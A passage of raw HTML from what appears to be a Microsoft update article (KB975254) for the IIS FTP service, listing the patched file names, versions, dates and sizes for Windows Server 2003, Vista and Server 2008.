class=\"sbody-td\">SP2GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">6.0.3790.4584</td><td class=\"sbody-td\">06-Sep-2009</td><td class=\"sbody-td\">08:12</td><td class=\"sbody-td\">128,512</td><td class=\"sbody-td\">SP2QFE</td></tr></table></div><h4 class=\"sbody-h4\">For all supported IA-64-based versions of Windows Server 2003</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File Name</th><th class=\"sbody-th\">Version</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Size</th><th class=\"sbody-th\">CPU</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">6.0.3790.4584</td><td class=\"sbody-td\">06-Sep-2009</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">339,968</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">6.0.3790.4584</td><td class=\"sbody-td\">06-Sep-2009</td><td class=\"sbody-td\">09:43</td><td class=\"sbody-td\">340,480</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2QFE</td></tr></table></div><h3 class=\"sbody-h3\">Windows Vista and Windows Server 2008 file information</h3><ul class=\"sbody-free_list\"><li>The files that apply to a specific product, milestone (RTM, SP<strong class=\"sbody-strong\">n</strong>), and service branch (LDR, GDR) can be identified by examining the file version numbers as shown in the following table:<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Version</span></td><td class=\"sbody-td\"><span class=\"text-base\">Product</span></td><td class=\"sbody-td\"><span class=\"text-base\">Milestone</span></td><td class=\"sbody-td\"><span class=\"text-base\">Service branch</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.0.600<span class=\"text-base\">0</span>.<span class=\"text-base\">16</span><strong class=\"sbody-strong\">xxx</strong></td><td class=\"sbody-td\">Windows Vista</td><td class=\"sbody-td\">RTM</td><td class=\"sbody-td\">GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.0.600<span class=\"text-base\">0</span>.<span class=\"text-base\">20</span><strong class=\"sbody-strong\">xxx</strong></td><td class=\"sbody-td\">Windows Vista</td><td class=\"sbody-td\">RTM</td><td class=\"sbody-td\">LDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.0.600<span class=\"text-base\">1</span>.<span class=\"text-base\">18</span><strong class=\"sbody-strong\">xxx</strong></td><td class=\"sbody-td\">Windows Vista SP1 and Windows Server 2008 SP1</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.0.600<span class=\"text-base\">1</span>.<span class=\"text-base\">22</span><strong class=\"sbody-strong\">xxx</strong></td><td class=\"sbody-td\">Windows Vista SP1 and Windows Server 2008 SP1</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">LDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.0.600<span class=\"text-base\">2</span>.<span class=\"text-base\">18</span><strong class=\"sbody-strong\">xxx</strong></td><td class=\"sbody-td\">Windows Vista SP2 and Windows Server 2008 SP2</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.0.600<span class=\"text-base\">2</span>.<span class=\"text-base\">22</span><strong class=\"sbody-strong\">xxx</strong></td><td class=\"sbody-td\">Windows Vista SP2 and Windows Server 2008 SP2</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">LDR</td></tr></table></div></li><li>Service Pack 1 is integrated into the release version of Windows Server 2008. Therefore, RTM milestone files apply only to Windows Vista. RTM milestone files have a 6.0.0000.<strong class=\"sbody-strong\">xxxxxx</strong> version number.</li><li>GDR service branches contain only those fixes that are widely released to address widespread, critical issues. LDR service branches contain hotfixes in addition to widely released fixes.</li></ul><h4 class=\"sbody-h4\">For all supported x86-based versions of Windows Vista and Windows Server 2008</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File Name</th><th class=\"sbody-th\">Version</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Size</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6000.16923</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">14:49</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">Windows6.0-KB975254-x86\\x86_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6000.16923_none_fb568ad2c062613e</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6000.16923</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">14:49</td><td class=\"sbody-td\">8,192</td><td class=\"sbody-td\">Windows6.0-KB975254-x86\\x86_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6000.16923_none_fb568ad2c062613e</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6000.16923</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">14:49</td><td class=\"sbody-td\">169,472</td><td class=\"sbody-td\">Windows6.0-KB975254-x86\\x86_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6000.16923_none_fb568ad2c062613e</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6000.21123</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:22</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">Windows6.0-KB975254-x86\\x86_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6000.21123_none_fbdfffbfd980344a</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6000.21123</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:22</td><td class=\"sbody-td\">8,192</td><td class=\"sbody-td\">Windows6.0-KB975254-x86\\x86_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6000.21123_none_fbdfffbfd980344a</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6000.21123</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:22</td><td class=\"sbody-td\">169,472</td><td class=\"sbody-td\">Windows6.0-KB975254-x86\\x86_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6000.21123_none_fbdfffbfd980344a</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6000.16386</td><td class=\"sbody-td\">02-Nov-2006</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">Windows6.0-KB975254-x86\\x86_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.18327_none_fd40caa0bd85578b</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6000.16386</td><td class=\"sbody-td\">02-Nov-2006</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">8,192</td><td class=\"sbody-td\">Windows6.0-KB975254-x86\\x86_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.18327_none_fd40caa0bd85578b</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6001.18327</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:05</td><td class=\"sbody-td\">167,936</td><td class=\"sbody-td\">Windows6.0-KB975254-x86\\x86_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.18327_none_fd40caa0bd85578b</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6001.22516</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">11:53</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">Windows6.0-KB975254-x86\\x86_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.22516_none_fdd438f3d69bbf34</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6001.22516</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">11:53</td><td class=\"sbody-td\">8,192</td><td class=\"sbody-td\">Windows6.0-KB975254-x86\\x86_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.22516_none_fdd438f3d69bbf34</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6001.22516</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">11:53</td><td class=\"sbody-td\">167,936</td><td class=\"sbody-td\">Windows6.0-KB975254-x86\\x86_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.22516_none_fdd438f3d69bbf34</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6000.16386</td><td class=\"sbody-td\">02-Nov-2006</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">Windows6.0-KB975254-x86\\x86_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.18107_none_ff3cde46ba9b71f4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6000.16386</td><td class=\"sbody-td\">02-Nov-2006</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">8,192</td><td class=\"sbody-td\">Windows6.0-KB975254-x86\\x86_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.18107_none_ff3cde46ba9b71f4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6002.18107</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">09:50</td><td class=\"sbody-td\">167,936</td><td class=\"sbody-td\">Windows6.0-KB975254-x86\\x86_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.18107_none_ff3cde46ba9b71f4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6002.22219</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">10:01</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">Windows6.0-KB975254-x86\\x86_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.22219_none_ffbdabb9d3bf605d</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6002.22219</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">10:01</td><td class=\"sbody-td\">8,192</td><td class=\"sbody-td\">Windows6.0-KB975254-x86\\x86_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.22219_none_ffbdabb9d3bf605d</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6002.22219</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">10:01</td><td class=\"sbody-td\">167,936</td><td class=\"sbody-td\">Windows6.0-KB975254-x86\\x86_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.22219_none_ffbdabb9d3bf605d</td></tr></table></div><h4 class=\"sbody-h4\">For all supported x64-based versions of Windows Vista and Windows Server 2008</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File Name</th><th class=\"sbody-th\">Version</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Size</th><th class=\"sbody-th\">CPU</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6000.16923</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:51</td><td class=\"sbody-td\">12,800</td><td class=\"sbody-td\">X64</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\amd64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6000.16923_none_5775265678bfd274</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6000.16923</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:51</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">X64</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\amd64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6000.16923_none_5775265678bfd274</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6000.16923</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:51</td><td class=\"sbody-td\">196,096</td><td class=\"sbody-td\">X64</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\amd64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6000.16923_none_5775265678bfd274</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6000.21123</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">13:03</td><td class=\"sbody-td\">12,800</td><td class=\"sbody-td\">X64</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\amd64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6000.21123_none_57fe9b4391dda580</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6000.21123</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">13:03</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">X64</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\amd64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6000.21123_none_57fe9b4391dda580</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6000.21123</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">13:03</td><td class=\"sbody-td\">196,096</td><td class=\"sbody-td\">X64</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\amd64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6000.21123_none_57fe9b4391dda580</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6001.18327</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:46</td><td class=\"sbody-td\">12,800</td><td class=\"sbody-td\">X64</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\amd64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.18327_none_595f662475e2c8c1</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6001.18327</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:46</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">X64</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\amd64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.18327_none_595f662475e2c8c1</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6001.18327</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:46</td><td class=\"sbody-td\">191,488</td><td class=\"sbody-td\">X64</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\amd64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.18327_none_595f662475e2c8c1</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6001.22516</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:12</td><td class=\"sbody-td\">12,800</td><td class=\"sbody-td\">X64</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\amd64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.22516_none_59f2d4778ef9306a</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6001.22516</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:12</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">X64</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\amd64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.22516_none_59f2d4778ef9306a</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6001.22516</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:12</td><td class=\"sbody-td\">191,488</td><td class=\"sbody-td\">X64</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\amd64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.22516_none_59f2d4778ef9306a</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6002.18107</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">11:50</td><td class=\"sbody-td\">12,800</td><td class=\"sbody-td\">X64</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\amd64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.18107_none_5b5b79ca72f8e32a</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6002.18107</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">11:50</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">X64</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\amd64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.18107_none_5b5b79ca72f8e32a</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6002.18107</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">11:50</td><td class=\"sbody-td\">191,488</td><td class=\"sbody-td\">X64</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\amd64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.18107_none_5b5b79ca72f8e32a</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6002.22219</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">11:47</td><td class=\"sbody-td\">12,800</td><td class=\"sbody-td\">X64</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\amd64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.22219_none_5bdc473d8c1cd193</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6002.22219</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">11:47</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">X64</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\amd64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.22219_none_5bdc473d8c1cd193</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6002.22219</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">11:47</td><td class=\"sbody-td\">191,488</td><td class=\"sbody-td\">X64</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\amd64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.22219_none_5bdc473d8c1cd193</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6000.16923</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">14:49</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6000.16923_none_61c9d0a8ad20946f</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6000.16923</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">14:49</td><td class=\"sbody-td\">8,192</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6000.16923_none_61c9d0a8ad20946f</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6000.16923</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">14:49</td><td class=\"sbody-td\">169,472</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6000.16923_none_61c9d0a8ad20946f</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6000.21123</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:22</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6000.21123_none_62534595c63e677b</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6000.21123</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:22</td><td class=\"sbody-td\">8,192</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6000.21123_none_62534595c63e677b</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6000.21123</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:22</td><td class=\"sbody-td\">169,472</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6000.21123_none_62534595c63e677b</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6000.16386</td><td class=\"sbody-td\">02-Nov-2006</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.18327_none_63b41076aa438abc</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6000.16386</td><td class=\"sbody-td\">02-Nov-2006</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">8,192</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.18327_none_63b41076aa438abc</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6001.18327</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:05</td><td class=\"sbody-td\">167,936</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.18327_none_63b41076aa438abc</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6001.22516</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">11:53</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.22516_none_64477ec9c359f265</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6001.22516</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">11:53</td><td class=\"sbody-td\">8,192</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.22516_none_64477ec9c359f265</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6001.22516</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">11:53</td><td class=\"sbody-td\">167,936</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.22516_none_64477ec9c359f265</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6000.16386</td><td class=\"sbody-td\">02-Nov-2006</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.18107_none_65b0241ca759a525</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6000.16386</td><td class=\"sbody-td\">02-Nov-2006</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">8,192</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.18107_none_65b0241ca759a525</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6002.18107</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">09:50</td><td class=\"sbody-td\">167,936</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.18107_none_65b0241ca759a525</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6002.22219</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">10:01</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.22219_none_6630f18fc07d938e</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6002.22219</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">10:01</td><td class=\"sbody-td\">8,192</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.22219_none_6630f18fc07d938e</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6002.22219</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">10:01</td><td class=\"sbody-td\">167,936</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.22219_none_6630f18fc07d938e</td></tr></table></div><h4 class=\"sbody-h4\">For all supported IA-64-based versions of Windows Server 2008</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File Name</th><th class=\"sbody-th\">Version</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Size</th><th class=\"sbody-th\">CPU</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6001.18000</td><td class=\"sbody-td\">19-Jan-2008</td><td class=\"sbody-td\">09:27</td><td class=\"sbody-td\">25,600</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\ia64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.18327_none_fd426e96bd836087</td></tr><tr class=\"sbody-tr\"><td 